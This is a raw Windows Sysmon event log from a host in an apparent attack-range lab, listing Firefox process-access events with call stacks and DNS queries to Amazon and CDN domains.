Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.548{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.753{59A5CD1D-8E56-6005-2E00-00000000A301}246416.13.101.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.746{59A5CD1D-8E56-6005-2E00-00000000A301}2464201.194.224.13.in-addr.arpa.0type: 12 server-13-224-194-201.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.745{59A5CD1D-8E56-6005-2E00-00000000A301}246411.173.248.3.in-addr.arpa.0type: 12 ec2-3-248-173-11.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.238{59A5CD1D-945A-6005-3305-00000000A301}7052images-na.ssl-images-amazon.com0type: 5 m.media-amazon.com;type: 5 f.media-amazon.com;type: 5 media.amazon.map.fastly.net;::ffff:151.101.13.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.112{59A5CD1D-945A-6005-3305-00000000A301}7052endpoint.prod.eu-west-1.forester.a2z.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.110{59A5CD1D-945A-6005-3305-00000000A301}7052endpoint.prod.eu-west-1.forester.a2z.com034.255.74.101;52.30.120.60;52.31.74.75;52.213.248.70;52.214.47.192;54.73.66.115;99.80.235.31;3.248.173.11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.109{59A5CD1D-945A-6005-3305-00000000A301}7052fls-eu.amazon.de0type: 5 fls-eu.amazon.com;type: 5 gateway.prod.eu-west-1.forester.a2z.com;type: 5 endpoint.prod.eu-west-1.forester.a2z.com;::ffff:3.248.173.11;::ffff:34.255.74.101;::ffff:52.30.120.60;::ffff:52.31.74.75;::ffff:52.213.248.70;::ffff:52.214.47.192;::ffff:54.73.66.115;::ffff:99.80.235.31;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.107{59A5CD1D-945A-6005-3305-00000000A301}7052m.media-amazon.com0type: 5 f.media-amazon.com;type: 5 media.amazon.map.fastly.net;::ffff:151.101.13.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.081{59A5CD1D-945A-6005-3305-00000000A301}7052media.amazon.map.fastly.net02a04:4e42:62::272;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.078{59A5CD1D-945A-6005-3305-00000000A301}7052media.amazon.map.fastly.net0151.101.13.16;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.192{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.192{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.973{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000017420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.973{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000017419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.973{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+3287301|C:\Program Files\Mozilla Firefox\xul.dll+328a801|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000017415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000017414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.740{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+3287301|C:\Program Files\Mozilla Firefox\xul.dll+328a801|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla 